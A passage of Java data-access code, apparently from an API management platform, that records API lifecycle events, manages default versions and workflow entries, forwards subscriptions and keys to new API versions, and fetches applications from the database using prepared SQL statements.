identifier, String oldStatus, String newStatus, String userId, int tenantId, Connection conn) throws APIManagementException { //Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement selectQuerySt = null; int apiId = -1; if (oldStatus == null && !newStatus.equals(APIConstants.CREATED)) { String msg = "Invalid old and new state combination"; log.error(msg); 
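            // A null previous state is only valid for the initial CREATED event; every other transition must supply its old state.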
throw new APIManagementException(msg); } else if (oldStatus != null && oldStatus.equals(newStatus)) { String msg = "No measurable differences in API state"; log.error(msg); throw new APIManagementException(msg); } String getAPIQuery = SQLConstants.GET_API_ID_SQL; String sqlQuery = SQLConstants.ADD_API_LIFECYCLE_EVENT_SQL; try { conn.setAutoCommit(false); selectQuerySt = conn.prepareStatement(getAPIQuery); selectQuerySt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); selectQuerySt.setString(2, identifier.getApiName()); selectQuerySt.setString(3, identifier.getVersion()); resultSet = selectQuerySt.executeQuery(); if (resultSet.next()) { apiId = resultSet.getInt("API_ID"); } if (apiId == -1) { String msg = "Unable to find the API: " + identifier + " in the database"; log.error(msg); throw new APIManagementException(msg); } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); if (oldStatus != null) { ps.setString(2, oldStatus); } else { ps.setNull(2, Types.VARCHAR); } ps.setString(3, newStatus); ps.setString(4, userId); ps.setInt(5, tenantId); ps.setTimestamp(6, new Timestamp(System.currentTimeMillis())); ps.executeUpdate(); // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the API state change record", e1); } } handleException("Failed to record API state change", e); } finally { APIMgtDBUtil.closeAllConnections(selectQuerySt, null, null); APIMgtDBUtil.closeAllConnections(ps, null, resultSet); } } public void updateDefaultAPIPublishedVersion(APIIdentifier identifier, String oldStatus, String newStatus) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); if (!oldStatus.equals(newStatus)) { if ((APIConstants.CREATED.equals(newStatus) || APIConstants.RETIRED.equals(newStatus)) && ( APIConstants.PUBLISHED.equals(oldStatus) || APIConstants.DEPRECATED.equals(oldStatus) || APIConstants.BLOCKED.equals(oldStatus))) { setPublishedDefVersion(identifier, conn, null); } else if (APIConstants.PUBLISHED.equals(newStatus) || APIConstants.DEPRECATED.equals(newStatus) || APIConstants.BLOCKED.equals(newStatus)) { setPublishedDefVersion(identifier, conn, identifier.getVersion()); } } conn.commit(); } catch (SQLException e) { handleException("Failed to update published default API state change", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } public List<LifeCycleEvent> getLifeCycleEvents(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_LIFECYCLE_EVENT_SQL; List<LifeCycleEvent> events = new ArrayList<LifeCycleEvent>(); try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmt.setString(2, apiId.getApiName()); prepStmt.setString(3, apiId.getVersion()); rs = prepStmt.executeQuery(); while (rs.next()) { LifeCycleEvent event = new LifeCycleEvent(); event.setApi(apiId); String oldState = rs.getString("PREVIOUS_STATE"); //event.setOldStatus(oldState != null ? APIStatus.valueOf(oldState) : null); event.setOldStatus(oldState != null ? 
oldState : null); //event.setNewStatus(APIStatus.valueOf(rs.getString("NEW_STATE"))); event.setNewStatus(rs.getString("NEW_STATE")); event.setUserId(rs.getString("USER_ID")); event.setDate(rs.getTimestamp("EVENT_DATE")); events.add(event); } Collections.sort(events, new Comparator<LifeCycleEvent>() { public int compare(LifeCycleEvent o1, LifeCycleEvent o2) { return o1.getDate().compareTo(o2.getDate()); } }); } catch (SQLException e) { handleException("Error when executing the SQL : " + sqlQuery, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return events; } public void makeKeysForwardCompatible(String provider, String apiName, String oldVersion, String newVersion, String context) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; PreparedStatement addSubKeySt = null; PreparedStatement getAppSt = null; ResultSet rs = null; String getSubscriptionDataQuery = SQLConstants.GET_SUBSCRIPTION_DATA_SQL; String addSubKeyMapping = SQLConstants.ADD_SUBSCRIPTION_KEY_MAPPING_SQL; String getApplicationDataQuery = SQLConstants.GET_APPLICATION_DATA_SQL; try { // Retrieve all the existing subscription for the old version connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(getSubscriptionDataQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(provider)); prepStmt.setString(2, apiName); prepStmt.setString(3, oldVersion); rs = prepStmt.executeQuery(); List<SubscriptionInfo> subscriptionData = new ArrayList<SubscriptionInfo>(); Set<Integer> subscribedApplications = new HashSet<Integer>(); while (rs.next() && !(APIConstants.SubscriptionStatus.ON_HOLD.equals(rs.getString("SUB_STATUS")))) { SubscriptionInfo info = new SubscriptionInfo(); info.subscriptionId = rs.getInt("SUBSCRIPTION_ID"); info.tierId = rs.getString("TIER_ID"); info.applicationId = rs.getInt("APPLICATION_ID"); info.accessToken = rs.getString("ACCESS_TOKEN"); // no decryption needed. 
info.tokenType = rs.getString("KEY_TYPE"); subscriptionData.add(info); } Map<Integer, Integer> subscriptionIdMap = new HashMap<Integer, Integer>(); APIIdentifier apiId = new APIIdentifier(provider, apiName, newVersion); for (SubscriptionInfo info : subscriptionData) { try { if (!subscriptionIdMap.containsKey(info.subscriptionId)) { apiId.setTier(info.tierId); int subscriptionId = addSubscription(apiId, context, info.applicationId, APIConstants .SubscriptionStatus.UNBLOCKED, provider); if (subscriptionId == -1) { String msg = "Unable to add a new subscription for the API: " + apiName + ":v" + newVersion; log.error(msg); throw new APIManagementException(msg); } subscriptionIdMap.put(info.subscriptionId, subscriptionId); } int subscriptionId = subscriptionIdMap.get(info.subscriptionId); connection.setAutoCommit(false); addSubKeySt = connection.prepareStatement(addSubKeyMapping); addSubKeySt.setInt(1, subscriptionId); addSubKeySt.setString(2, info.accessToken); addSubKeySt.setString(3, info.tokenType); addSubKeySt.execute(); connection.commit(); subscribedApplications.add(info.applicationId); // catching the exception because when copy the api without the option "require re-subscription" // need to go forward rather throwing the exception } catch (SubscriptionAlreadyExistingException e) { log.error("Error while adding subscription " + e.getMessage(), e); } } getAppSt = connection.prepareStatement(getApplicationDataQuery); getAppSt.setString(1, APIUtil.replaceEmailDomainBack(provider)); getAppSt.setString(2, apiName); getAppSt.setString(3, oldVersion); rs = getAppSt.executeQuery(); while (rs.next()) { int applicationId = rs.getInt("APPLICATION_ID"); if (!subscribedApplications.contains(applicationId)) { apiId.setTier(rs.getString("TIER_ID")); try { addSubscription(apiId, rs.getString("CONTEXT"), applicationId, APIConstants .SubscriptionStatus.UNBLOCKED, provider); // catching the exception because when copy the api without the option "require re-subscription" // need to go forward rather throwing the exception } catch (SubscriptionAlreadyExistingException e) { //Not handled as an error because same subscription can be there in many previous versions. //Ex: if previous version was created by another older version and if the subscriptions are //Forwarded, then the third one will get same subscription from previous two versions. 
log.info("Subscription already exists: " + e.getMessage()); } } } } catch (SQLException e) { handleException("Error when executing the SQL queries", e); } finally { APIMgtDBUtil.closeAllConnections(getAppSt, null, null); APIMgtDBUtil.closeAllConnections(addSubKeySt, null, null); APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } } public void addAPI(API api, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String query = SQLConstants.ADD_API_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(query, new String[]{"api_id"}); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmt.setString(2, api.getId().getApiName()); prepStmt.setString(3, api.getId().getVersion()); prepStmt.setString(4, api.getContext()); String contextTemplate = api.getContextTemplate(); //Validate if the API has an unsupported context before executing the query String invalidContext = "/" + APIConstants.VERSION_PLACEHOLDER; if (invalidContext.equals(contextTemplate)) { throw new APIManagementException("Cannot add API : " + api.getId() + " with unsupported context : " + contextTemplate); } //If the context template ends with {version} this means that the version will be at the end of the context. if (contextTemplate.endsWith("/" + APIConstants.VERSION_PLACEHOLDER)) { //Remove the {version} part from the context template. contextTemplate = contextTemplate.split(Pattern.quote("/" + APIConstants.VERSION_PLACEHOLDER))[0]; } prepStmt.setString(5, contextTemplate); prepStmt.setString(6, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmt.setTimestamp(7, new Timestamp(System.currentTimeMillis())); prepStmt.setString(8, api.getApiLevelPolicy()); prepStmt.execute(); rs = prepStmt.getGeneratedKeys(); int apiId = -1; if (rs.next()) { apiId = rs.getInt(1); } connection.commit(); if (api.getScopes() != null) { synchronized (scopeMutex) { addScopes(api.getScopes(), api.getId(), apiId, tenantId); } } addURLTemplates(apiId, api, connection); String tenantUserName = MultitenantUtils .getTenantAwareUsername(APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); recordAPILifeCycleEvent(api.getId(), null, APIStatus.CREATED.toString(), tenantUserName, tenantId, connection); //If the api is selected as default version, it is added/replaced into AM_API_DEFAULT_VERSION table if (api.isDefaultVersion()) { addUpdateAPIAsDefaultVersion(api, connection); } connection.commit(); } catch (SQLException e) { handleException("Error while adding the API: " + api.getId() + " to the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } } public String getDefaultVersion(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String oldDefaultVersion = null; String query = SQLConstants.GET_DEFAULT_VERSION_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiId.getApiName()); prepStmt.setString(2, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); rs = prepStmt.executeQuery(); if (rs.next()) { oldDefaultVersion = rs.getString("DEFAULT_API_VERSION"); } } catch (SQLException e) { handleException("Error while getting default version for " + apiId.getApiName(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } 
return oldDefaultVersion;
    }

    /**
     * Persists a WorkflowDTO to the database.
     *
     * @param workflow workflow entry to be persisted
     * @throws APIManagementException
     */
    public void addWorkflowEntry(WorkflowDTO workflow) throws APIManagementException {
        Connection connection = null;
        PreparedStatement prepStmt = null;
        String query = SQLConstants.ADD_WORKFLOW_ENTRY_SQL;
        try {
            Timestamp createdDateStamp = new Timestamp(workflow.getCreatedTime());
            connection = APIMgtDBUtil.getConnection();
            connection.setAutoCommit(false);
            prepStmt = connection.prepareStatement(query);
            prepStmt.setString(1, workflow.getWorkflowReference());
            prepStmt.setString(2, workflow.getWorkflowType());
            prepStmt.setString(3, workflow.getStatus().toString());
            prepStmt.setTimestamp(4, createdDateStamp);
            prepStmt.setString(5, workflow.getWorkflowDescription());
            prepStmt.setInt(6, workflow.getTenantId());
            prepStmt.setString(7, workflow.getTenantDomain());
            prepStmt.setString(8, workflow.getExternalWorkflowReference());
            prepStmt.execute();
            connection.commit();
        } catch (SQLException e) {
            handleException("Error while adding Workflow : " + workflow.getExternalWorkflowReference() + " to the " +
                    "database", e);
        } finally {
            APIMgtDBUtil.closeAllConnections(prepStmt, connection, null);
        }
    }

    public void updateWorkflowStatus(WorkflowDTO workflowDTO) throws APIManagementException {
        Connection connection = null;
        PreparedStatement prepStmt = null;
        String query = SQLConstants.UPDATE_WORKFLOW_ENTRY_SQL;
        try {
            connection = APIMgtDBUtil.getConnection();
            connection.setAutoCommit(false);
            prepStmt = connection.prepareStatement(query);
            prepStmt.setString(1, workflowDTO.getStatus().toString());
            prepStmt.setString(2, workflowDTO.getWorkflowDescription());
            prepStmt.setString(3, workflowDTO.getExternalWorkflowReference());
            prepStmt.execute();
            connection.commit();
        } catch (SQLException e) {
            handleException("Error while updating Workflow Status of workflow " + workflowDTO
                    .getExternalWorkflowReference(), e);
        } finally {
            APIMgtDBUtil.closeAllConnections(prepStmt, connection, null);
        }
    }

    /**
     * Returns a workflow object for a given external workflow reference.
* * @param workflowReference * @return * @throws APIManagementException */ public WorkflowDTO retrieveWorkflow(String workflowReference) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; WorkflowDTO workflowDTO = null; String query = SQLConstants.GET_ALL_WORKFLOW_ENTRY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, workflowReference); rs = prepStmt.executeQuery(); while (rs.next()) { workflowDTO = WorkflowExecutorFactory.getInstance().createWorkflowDTO(rs.getString("WF_TYPE")); workflowDTO.setStatus(WorkflowStatus.valueOf(rs.getString("WF_STATUS"))); workflowDTO.setExternalWorkflowReference(rs.getString("WF_EXTERNAL_REFERENCE")); workflowDTO.setCreatedTime(rs.getTimestamp("WF_CREATED_TIME").getTime()); workflowDTO.setWorkflowReference(rs.getString("WF_REFERENCE")); workflowDTO.setTenantDomain(rs.getString("TENANT_DOMAIN")); workflowDTO.setTenantId(rs.getInt("TENANT_ID")); workflowDTO.setWorkflowDescription(rs.getString("WF_STATUS_DESC")); } } catch (SQLException e) { handleException("Error while retrieving workflow details for " + workflowReference, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return workflowDTO; } /** * Returns a workflow object for a given internal workflow reference and the workflow type. * * @param workflowReference * @param workflowType * @return * @throws APIManagementException */ public WorkflowDTO retrieveWorkflowFromInternalReference(String workflowReference, String workflowType) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; WorkflowDTO workflowDTO = null; String query = SQLConstants.GET_ALL_WORKFLOW_ENTRY_FROM_INTERNAL_REF_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, workflowReference); prepStmt.setString(2, workflowType); rs = prepStmt.executeQuery(); while (rs.next()) { workflowDTO = WorkflowExecutorFactory.getInstance().createWorkflowDTO(rs.getString("WF_TYPE")); workflowDTO.setStatus(WorkflowStatus.valueOf(rs.getString("WF_STATUS"))); workflowDTO.setExternalWorkflowReference(rs.getString("WF_EXTERNAL_REFERENCE")); workflowDTO.setCreatedTime(rs.getTimestamp("WF_CREATED_TIME").getTime()); workflowDTO.setWorkflowReference(rs.getString("WF_REFERENCE")); workflowDTO.setTenantDomain(rs.getString("TENANT_DOMAIN")); workflowDTO.setTenantId(rs.getInt("TENANT_ID")); workflowDTO.setWorkflowDescription(rs.getString("WF_STATUS_DESC")); } } catch (SQLException e) { handleException("Error while retrieving workflow details for " + workflowReference, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return workflowDTO; } private void setPublishedDefVersion(APIIdentifier apiId, Connection connection, String value) throws APIManagementException { String queryDefaultVersionUpdate = SQLConstants.UPDATE_PUBLISHED_DEFAULT_VERSION_SQL; PreparedStatement prepStmtDefVersionUpdate = null; try { prepStmtDefVersionUpdate = connection.prepareStatement(queryDefaultVersionUpdate); prepStmtDefVersionUpdate.setString(1, value); prepStmtDefVersionUpdate.setString(2, apiId.getApiName()); prepStmtDefVersionUpdate.setString(3, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmtDefVersionUpdate.execute(); } catch (SQLException e) { handleException("Error while deleting the API default version entry: " + apiId.getApiName() + " from the 
" + "database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtDefVersionUpdate, null, null); } } /** * Sets/removes default api entry such that api will not represent as default api further. * If the api's version is the same as the published version, then the whole entry will be removed. * Otherwise only the default version attribute is set to null. * * @param apiId * @param connection * @return * @throws APIManagementException */ public void removeAPIFromDefaultVersion(APIIdentifier apiId, Connection connection) throws APIManagementException { String queryDefaultVersionDelete = SQLConstants.REMOVE_API_DEFAULT_VERSION_SQL; PreparedStatement prepStmtDefVersionDelete = null; try { prepStmtDefVersionDelete = connection.prepareStatement(queryDefaultVersionDelete); prepStmtDefVersionDelete.setString(1, apiId.getApiName()); prepStmtDefVersionDelete.setString(2, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmtDefVersionDelete.execute(); } catch (SQLException e) { handleException("Error while deleting the API default version entry: " + apiId.getApiName() + " from the " + "database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtDefVersionDelete, null, null); } } public String getPublishedDefaultVersion(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String publishedDefaultVersion = null; String query = SQLConstants.GET_PUBLISHED_DEFAULT_VERSION_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiId.getApiName()); prepStmt.setString(2, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); rs = prepStmt.executeQuery(); while (rs.next()) { publishedDefaultVersion = rs.getString("PUBLISHED_DEFAULT_API_VERSION"); } } catch (SQLException e) { handleException("Error while getting default version for " + apiId.getApiName(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return publishedDefaultVersion; } public void addUpdateAPIAsDefaultVersion(API api, Connection connection) throws APIManagementException { String publishedDefaultVersion = getPublishedDefaultVersion(api.getId()); removeAPIFromDefaultVersion(api.getId(), connection); PreparedStatement prepStmtDefVersionAdd = null; String queryDefaultVersionAdd = SQLConstants.ADD_API_DEFAULT_VERSION_SQL; try { prepStmtDefVersionAdd = connection.prepareStatement(queryDefaultVersionAdd); prepStmtDefVersionAdd.setString(1, api.getId().getApiName()); prepStmtDefVersionAdd.setString(2, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmtDefVersionAdd.setString(3, api.getId().getVersion()); String apistatus = api.getStatus(); if (APIConstants.PUBLISHED.equals(apistatus) || APIConstants.DEPRECATED.equals(apistatus) || APIConstants .BLOCKED.equals(apistatus)) { prepStmtDefVersionAdd.setString(4, api.getId().getVersion()); } else { prepStmtDefVersionAdd.setString(4, publishedDefaultVersion); } prepStmtDefVersionAdd.execute(); } catch (SQLException e) { handleException("Error while adding the API default version entry: " + api.getId().getApiName() + " to " + "the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtDefVersionAdd, null, null); } } /** * Adds URI templates define for an API * * @param apiId * @param api * @param connection * @throws APIManagementException */ public void addURLTemplates(int apiId, API api, Connection connection) throws APIManagementException { if (apiId == -1) { 
//application addition has failed return; } PreparedStatement prepStmt = null; PreparedStatement scopePrepStmt = null; String query = SQLConstants.ADD_URL_MAPPING_SQL; String scopeQuery = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; try { prepStmt = connection.prepareStatement(query); scopePrepStmt = connection.prepareStatement(scopeQuery); Iterator<URITemplate> uriTemplateIterator = api.getUriTemplates().iterator(); URITemplate uriTemplate; for (; uriTemplateIterator.hasNext(); ) { uriTemplate = uriTemplateIterator.next(); prepStmt.setInt(1, apiId); prepStmt.setString(2, uriTemplate.getHTTPVerb()); prepStmt.setString(3, uriTemplate.getAuthType()); prepStmt.setString(4, uriTemplate.getUriTemplate()); //If API policy is available then set it for all the resources. if (StringUtils.isEmpty(api.getApiLevelPolicy())) { prepStmt.setString(5, (StringUtils.isEmpty(uriTemplate.getThrottlingTier())) ? APIConstants.UNLIMITED_TIER : uriTemplate.getThrottlingTier()); } else { prepStmt.setString(5, (StringUtils.isEmpty(api.getApiLevelPolicy())) ? APIConstants.UNLIMITED_TIER : api.getApiLevelPolicy()); } InputStream is; if (uriTemplate.getMediationScript() != null) { is = new ByteArrayInputStream(uriTemplate.getMediationScript().getBytes(Charset.defaultCharset())); } else { is = null; } if (connection.getMetaData().getDriverName().contains("PostgreSQL") || connection.getMetaData() .getDatabaseProductName().contains("DB2")) { if (uriTemplate.getMediationScript() != null) { prepStmt.setBinaryStream(6, is, uriTemplate.getMediationScript().getBytes(Charset.defaultCharset()).length); } else { prepStmt.setBinaryStream(6, is, 0); } } else { prepStmt.setBinaryStream(6, is); } prepStmt.addBatch(); if (uriTemplate.getScope() != null) { scopePrepStmt.setString(1, APIUtil.getResourceKey(api, uriTemplate)); if (uriTemplate.getScope().getId() == 0) { String scopeKey = uriTemplate.getScope().getKey(); Scope scopeByKey = APIUtil.findScopeByKey(api.getScopes(), scopeKey); if (scopeByKey != null) { if (scopeByKey.getId() > 0) { uriTemplate.getScopes().setId(scopeByKey.getId()); } } } scopePrepStmt.setInt(2, uriTemplate.getScope().getId()); scopePrepStmt.setInt(3, APIUtil.getTenantId(APIUtil.replaceEmailDomainBack(api.getId() .getProviderName()))); scopePrepStmt.addBatch(); } } prepStmt.executeBatch(); prepStmt.clearBatch(); scopePrepStmt.executeBatch(); scopePrepStmt.clearBatch(); } catch (SQLException e) { handleException("Error while adding URL template(s) to the database for API : " + api.getId(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, null, null); APIMgtDBUtil.closeAllConnections(scopePrepStmt, null, null); } } /** * Fetches an Application with OAuth Apps, by name. * * @param applicationName Name of the Application * @param userId Name of the User. * @param groupId Group ID * @throws APIManagementException */ public Application getApplicationWithOAuthApps(String applicationName, String userId, String groupId) throws APIManagementException { Application application = getApplicationByName(applicationName, userId, groupId); if (application != null) { Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } } return application; } /** * Checks whether application is accessible to the specified user * * @param applicationID ID of the Application * @param userId Name of the User. 
* @param groupId Group IDs * @throws APIManagementException */ public boolean isAppAllowed(int applicationID, String userId, String groupId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); String query = "SELECT APP.APPLICATION_ID FROM AM_SUBSCRIBER SUB, AM_APPLICATION APP"; String whereClause = " WHERE SUB.USER_ID =? AND APP.APPLICATION_ID=? AND " + "SUB.SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseCaseInSensitive = " WHERE LOWER(SUB.USER_ID) =LOWER(?) AND APP.APPLICATION_ID=? AND SUB" + ".SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseWithGroupId = " WHERE (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?)) AND " + "APP.APPLICATION_ID = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithMultiGroupId = " WHERE ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR SUB.USER_ID = ? " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) " + "AND APP.APPLICATION_ID = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; if (!StringUtils.isEmpty(groupId) && !APIConstants.NULL_GROUPID_LIST.equals(groupId)) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); query += whereClauseWithMultiGroupId; String[] groupIds = groupId.split(","); int parameterIndex = groupIds.length; prepStmt = fillQueryParams(connection, query, groupIds, 1); prepStmt.setString(++parameterIndex, tenantDomain); prepStmt.setString(++parameterIndex, userId); prepStmt.setString(++parameterIndex, tenantDomain + '/' + groupId); prepStmt.setInt(++parameterIndex, applicationID); } else { query += whereClauseWithGroupId; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, groupId); prepStmt.setString(2, userId); prepStmt.setInt(3, applicationID); } } else { if (forceCaseInsensitiveComparisons) { query += whereClauseCaseInSensitive; } else { query += whereClause; } prepStmt = connection.prepareStatement(query); prepStmt.setString(1, userId); prepStmt.setInt(2, applicationID); } rs = prepStmt.executeQuery(); while (rs.next()) { return true; } } catch (SQLException e) { handleException("Error while checking whether the application : " + applicationID + " is accessible " + "to user " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return false; } /** * Fetches an Application by name. * * @param applicationName Name of the Application * @param userId Name of the User. * @param groupId Group ID * @throws APIManagementException */ public Application getApplicationByName(String applicationName, String userId, String groupId) throws APIManagementException { //mysql> select APP.APPLICATION_ID, APP.NAME, APP.SUBSCRIBER_ID,APP.APPLICATION_TIER,APP.CALLBACK_URL,APP // .DESCRIPTION, // APP.APPLICATION_STATUS from AM_SUBSCRIBER as SUB,AM_APPLICATION as APP // where SUB.user_id='admin' AND APP.name='DefaultApplication' AND SUB.SUBSCRIBER_ID=APP.SUBSCRIBER_ID; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int applicationId = 0; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_NAME_PREFIX; String whereClause = " WHERE SUB.USER_ID =? AND APP.NAME=? 
AND SUB.SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseCaseInSensitive = " WHERE LOWER(SUB.USER_ID) =LOWER(?) AND APP.NAME=? AND SUB" + "" + ".SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseWithGroupId = " WHERE (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?)) AND " + "APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithGroupIdCaseInSensitive = " WHERE (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND LOWER(SUB.USER_ID) = LOWER(?))) AND " + "APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithMultiGroupId = " WHERE ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR SUB.USER_ID = ? " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) " + "AND APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithMultiGroupIdCaseInSensitive = " WHERE ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR LOWER(SUB.USER_ID) = LOWER(?) " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) " + "AND APP.NAME = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; if (groupId != null && !"null".equals(groupId) && !groupId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithMultiGroupIdCaseInSensitive; } else { query = query + whereClauseWithMultiGroupId; } String[] groupIds = groupId.split(","); int parameterIndex = groupIds.length; prepStmt = fillQueryParams(connection, query, groupIds, 1); prepStmt.setString(++parameterIndex, tenantDomain); prepStmt.setString(++parameterIndex, userId); prepStmt.setString(++parameterIndex, tenantDomain + '/' + groupId); prepStmt.setString(++parameterIndex, applicationName); } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithGroupIdCaseInSensitive; } else { query = query + whereClauseWithGroupId; } prepStmt = connection.prepareStatement(query); prepStmt.setString(1, groupId); prepStmt.setString(2, userId); prepStmt.setString(3, applicationName); } } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseCaseInSensitive; } else { query = query + whereClause; } prepStmt = connection.prepareStatement(query); prepStmt.setString(1, userId); prepStmt.setString(2, applicationName); } rs = prepStmt.executeQuery(); while (rs.next()) { String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setOwner(rs.getString("CREATED_BY")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); applicationId = rs.getInt("APPLICATION_ID"); application.setId(applicationId); application.setTier(rs.getString("APPLICATION_TIER")); application.setUUID(rs.getString("UUID")); application.setGroupId(rs.getString("GROUP_ID")); application.setOwner(rs.getString("CREATED_BY")); application.setTokenType(rs.getString("TOKEN_TYPE")); if 
(multiGroupAppSharingEnabled) { setGroupIdInApplication(application); } if (application != null) { Map<String, String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } private void setGroupIdInApplication(Application application) throws APIManagementException { String applicationGroupId = application.getGroupId(); if (StringUtils.isEmpty(applicationGroupId)) { // No migrated App groupId application.setGroupId(getGroupId(application.getId())); } else { // Migrated data exists where Group ID for this App has been stored in AM_APPLICATION table // in the format 'tenant/groupId', so extract groupId value and store it in the App object String[] split = applicationGroupId.split("/"); if (split.length == 2) { application.setGroupId(split[1]); } else { log.error("Migrated Group ID: " + applicationGroupId + "does not follow the expected format 'tenant/groupId'"); } } } public Application getApplicationById(int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_ID_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, applicationId); rs 